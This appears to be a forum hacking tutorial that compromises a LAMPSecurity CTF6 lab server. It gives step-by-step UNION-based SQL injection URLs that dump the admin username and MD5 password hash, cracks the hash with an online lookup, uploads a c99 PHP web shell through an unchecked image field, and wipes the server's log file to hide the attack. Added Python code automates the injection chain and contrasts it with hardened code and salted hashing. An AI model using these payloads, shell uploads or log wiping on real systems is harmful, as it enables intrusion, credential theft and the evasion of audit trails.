Hi All,
In this tutorial we will be compromising a vulnerable web server using the Mantra Security Toolkit: SQL injection to dump the admin credentials, then the admin panel to upload a PHP shell.
What all you need
1. Mantra Security Toolkit - Download
2. A vulnerable website. I'm using a modified version of LAMPSecurity CTF6
3. Any PHP shell you are comfortable with
- Google for "c99 shell"
Now the process
Step 1:
I'm on the home page of the website now
Code:
http://192.168.132.128/
Step 2:
I went through all the pages of the web site and found a page that takes a value from the URL (the id parameter)
Code:
http://192.168.132.128/?id=13
Step 3:
I launched Hackbar by pressing F9
Step 4:
The power of the single quote. I check whether the web site is vulnerable by putting a ' at the end of the URL and pressing Execute.
Code:
http://192.168.132.128/?id=13'
The page content is different from the previous one, so the quote reached the database query: the id value is going into the SQL unescaped. A changed page is a strong hint; an SQL error message in the response is what confirms it.
Step 5:
Let's find out the number of columns the page's query selects. ORDER BY n works only while n is no larger than that count, so the first n that breaks the page gives it away
Code:
http://192.168.132.128/?id=13 order by 1
Step 6:
I have to keep on increasing the last number till I see a change in the page. Done by hand this is tedious, but with this tool I can simply press the + button till I see a change on the web page
Code:
http://192.168.132.128/?id=13 order by 7
Step 7:
I went up to 7 and no change so far
Code:
http://192.168.132.128/?id=13 order by 7
Step 8:
I'm on 8 now and I can see the page changed
Code:
http://192.168.132.128/?id=13 order by 8
Step 9:
Now let's go ahead and make a UNION statement. I just went to SQL > UNION SELECT STATEMENT
Step 10:
I provided the number of columns. Since the page broke at ORDER BY 8, column 8 does not exist and the query selects exactly 7 columns, so the UNION SELECT has to supply 7 values as well
Step 11:
Wonderful. I can see some numbers on the page now. Those are the columns whose values the page actually prints, so anything I put in those positions will be displayed. Let's take number 2
Code:
http://192.168.132.128/?id=13 UNION SELECT 1,2,3,4,5,6,7
Step 12:
I replaced number 2 in the URL with an SQL function; it got executed and the result is displayed on the page
Code:
http://192.168.132.128/?id=13 UNION SELECT 1,user(),3,4,5,6,7
The current database user is cms_user@localhost
Step 13:
Let's find out the version of the database. I replaced 2 in the URL with the version() function
Code:
http://192.168.132.128/?id=13 UNION SELECT 1,version(),3,4,5,6,7
5.0.45 is the MySQL version
Step 14:
Let me list all the tables
Code:
http://192.168.132.128/?id=13 UNION SELECT 1,table_name,3,4,5,6,7 from information_schema.tables
This lists every table in every schema the database user can see, including the information_schema ones themselves; filtering on table_schema narrows it to the application's own database. From this list I found "user" is an interesting table
Step 15:
Now I listed all the columns, and it's a big list
Code:
http://192.168.132.128/?id=13 UNION SELECT 1,column_name,3,4,5,6,7 from information_schema.columns
Step 16:
I want the columns of the table "user" and nothing else
Code:
http://192.168.132.128/?id=13 UNION SELECT 1,column_name,3,4,5,6,7 from information_schema.columns where table_name='user'
Step 17:
Let's find the user name
Code:
http://192.168.132.128/?id=13 UNION SELECT 1,user_username,3,4,5,6,7 from user
Step 18:
Now, what about the password
Code:
http://192.168.132.128/?id=13 UNION SELECT 1,user_password,3,4,5,6,7 from user
It's not stored in clear text: it's a 32-character hex string, which is an MD5 hash. That is hashing, not encryption, so there is nothing to decrypt, but an unsalted MD5 of a common password can simply be looked up
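Steps 4 to 18 above as one runnable model. This is an added example, not the tutorial's own code and not LAMPSecurity CTF6's: an in-memory sqlite3 database stands in for the MySQL backend, `vulnerable_page` is the page query with the same string-concatenation bug, `safe_page` is the fix, and the functions below automate the ORDER BY count, the UNION marker test and the extraction of values through a displayed column. The table and column names, the rows and the stored hash are constructed; `sqlite_version()` and `sqlite_master` replace `version()` and `information_schema`, which SQLite does not have.

```python
import re
import sqlite3

# Constructed sample data (not from the CTF image): an "events" table with
# 7 columns, matching the ORDER BY result in the tutorial, and a "user"
# table shaped like the one it dumps. The stored hash is MD5("admin"),
# an assumption; the page never shows the real hash.
SCHEMA = """
CREATE TABLE events(id INTEGER, title TEXT, body TEXT, date TEXT,
                    location TEXT, picture TEXT, author TEXT);
INSERT INTO events VALUES(13, 'Launch party', 'Free food', '2009-01-01',
                          'Hall A', 'party.jpg', 'admin');
CREATE TABLE user(user_id INTEGER, user_username TEXT, user_password TEXT);
INSERT INTO user VALUES(1, 'admin', '21232f297a57a5a743894a0e4a801fc3');
"""
conn = sqlite3.connect(":memory:")
conn.executescript(SCHEMA)


def render(rows):
    # The page prints only title and body (columns 2 and 3). The other five
    # are fetched but never shown, which is why only some UNION markers appear.
    return "\n".join(f"{r[1]} | {r[2]}" for r in rows)


def vulnerable_page(id_param):
    """The tutorial's bug: the id from the URL is concatenated into the SQL."""
    try:
        return render(conn.execute("SELECT * FROM events WHERE id=" + id_param))
    except sqlite3.Error as exc:
        return f"ERROR: {exc}"  # the 'different page' the tutorial keys on


def safe_page(id_param):
    """Hardened form: strict input check plus a bound parameter."""
    if not re.fullmatch(r"[0-9]{1,9}", id_param):
        return "ERROR: bad id"
    return render(conn.execute("SELECT * FROM events WHERE id=?", (int(id_param),)))


def find_column_count(page_fn, base_id="13", limit=50):
    """Steps 5-8: ORDER BY n renders normally while n <= column count and
    breaks the page at n+1, so the last good n is the count. Returns 0 when
    even ORDER BY 1 changes the page (nothing is being injected)."""
    baseline = page_fn(base_id)
    for n in range(1, limit + 1):
        if page_fn(f"{base_id} order by {n}") != baseline:
            return n - 1
    return None  # hit the limit without a change: something else is going on


def find_reflected_columns(page_fn, ncols, base_id="13"):
    """Steps 9-11: UNION SELECT one distinct marker per column; the markers
    that show up on the page are the positions whose values get displayed."""
    markers = ",".join(f"'M{i}'" for i in range(1, ncols + 1))
    page = page_fn(f"{base_id} UNION SELECT {markers}")
    return sorted(int(m) for m in re.findall(r"\bM(\d+)\b", page))


def extract(page_fn, ncols, reflected, slot, expression):
    """Steps 12-18: put an SQL expression in a displayed slot and read it back.
    id=-1 matches no real row, so only the injected row is rendered."""
    cols = [f"'x{i}'" for i in range(1, ncols + 1)]
    cols[slot - 1] = expression
    page = page_fn(f"-1 UNION SELECT {','.join(cols)}")
    return page.split(" | ")[reflected.index(slot)]


def dump(page_fn):
    """The whole chain against one page function. sqlite_version() and
    sqlite_master stand in for MySQL's version() and information_schema."""
    ncols = find_column_count(page_fn)
    if not ncols:
        return {"columns": ncols}
    shown = find_reflected_columns(page_fn, ncols)
    slot = shown[0]

    def grab(expr):
        return extract(page_fn, ncols, shown, slot, expr)

    return {
        "columns": ncols,
        "shown": shown,
        "version": grab("sqlite_version()"),
        "tables": grab("(SELECT group_concat(name) FROM sqlite_master WHERE type='table')"),
        "password": grab("(SELECT user_password FROM user WHERE user_username='admin')"),
    }


if __name__ == "__main__":
    print("vulnerable:", dump(vulnerable_page))
    print("hardened:  ", dump(safe_page))
```

Two things the model makes visible that the walkthrough glosses over: the hardened page also returns a "different page" for `13'`, so a changed response after a quote is a hint rather than proof (an SQL error in the response body is the real tell), and the number that ORDER BY finds is the count of columns in the page's query, not the number of tables in the database.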
Step 19:
Looking up the hash. I copied the MD5 hash, pasted it into Hackbar and went to Encryption > MD5 Menu > send to > md5.rednoize.com, an online lookup service that returns the plaintext if the hash is in its precomputed table
Step 20:
Voila! I got the password
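Why step 19 works, and what would have stopped it, as an added example (mine, not from the tutorial or the CTF): an unsalted MD5 is identical for a given password on every site, so a lookup service only has to keep one precomputed table; a per-user salt with a slow KDF makes that table useless and every guess expensive. The wordlist is constructed, the target hash is MD5("admin") because the page never shows the hash it looked up, and the storage format string is this example's own, not any library's.

```python
import hashlib
import os
import secrets

# Constructed wordlist standing in for the precomputed table behind an online
# MD5 lookup service. The target used below is MD5("admin"), an assumption.
WORDLIST = ["123456", "password", "letmein", "admin", "qwerty"]


def md5_hex(word):
    return hashlib.md5(word.encode()).hexdigest()


def lookup_md5(target_hex, wordlist=WORDLIST):
    """What step 19's lookup service does: unsalted MD5 of a given word is the
    same on every site, so one table built once answers for all of them."""
    table = {md5_hex(w): w for w in wordlist}
    return table.get(target_hex.lower())


def hash_password(password, salt=None, iterations=600_000):
    """Hardened storage: random per-user salt plus a slow KDF. The stored
    format 'pbkdf2_sha256$iterations$salt_hex$dk_hex' is this example's own."""
    salt = salt if salt is not None else os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password, stored):
    _algo, iters, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iters))
    return secrets.compare_digest(dk.hex(), dk_hex)  # constant-time compare


def guess_pbkdf2(stored, wordlist=WORDLIST):
    """Against a salted slow hash there is no table to look up: every guess
    costs a full KDF run, per user. A weak password still falls, just slowly."""
    for w in wordlist:
        if verify_password(w, stored):
            return w
    return None


if __name__ == "__main__":
    print(lookup_md5("21232f297a57a5a743894a0e4a801fc3"))  # instant
    stored = hash_password("admin")
    print(stored)
    print(guess_pbkdf2(stored))  # still "admin", but only after 600k rounds per guess
```

The salt does not rescue a password like "admin"; it only removes the shortcut. The lesson for the CTF application is two-fold: store a salted slow hash, and do not let the hash leave the database through an injectable page in the first place.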
Step 21:
Finding the log in page. It was right in front of me
Step 22:
Logging in with the credentials I have
Step 23:
Greetings!
Step 24:
I'm an admin now. Look at my powers.
Step 25:
Let me add an event
Step 26:
and of course I want to upload a picture
Step 27:
Let's see whether it allows me to upload the shell or not. The upload field expects a picture; I'm giving it the PHP shell instead
Step 28:
Now I'm pressing the "Add Event" button
Step 29:
Nice. Looks like it got uploaded: the application accepted a .php file in the picture field without checking its type
Step 30:
Let's see where the shell got uploaded to
Step 31:
I'm trying to guess the default upload location
Step 32:
Looks like I got it
Let me click on the c9shell.php file I just uploaded
Step 33:
Voila. I have shell access. Note that the shell runs as the web server's own account, not as root, so it can read and write whatever that account can
Step 34:
I simply clicked on the up button until I reached the root of the file system
Now I can do whatever I wish: deface the website, maintain access, or whatever. But that is out of the scope of the current tutorial
Step 35:
What I'm interested in is the log folder
Step 36:
I clicked on the log.log file and it has the logs of my noisy SQL injection attacks
Step 37:
Let me go back and edit the log file
Step 38:
I deleted all the log entries. Now saving it.
Step 39:
Nice. The log file is empty now. This only worked because the log was writable by the web server account and lived on the same box; logs shipped to a separate host as they are written would still hold every one of those requests
Step 40:
Now let's remove the c99 shell by pressing Self Remove
Step 41:
Confirmed!
Step 42:
OK. Good bye C99
Step 43:
Well, it deleted itself
Happy Hacking.!!!
======================================================================
Note: This tutorial is only for educational purposes. I do not take any responsibility for any misuse; you will be solely responsible for any misuse that you do. Scanning servers and web hacking are criminal activities punishable under cyber crime law, and you may get up to 40 years of imprisonment if caught doing so.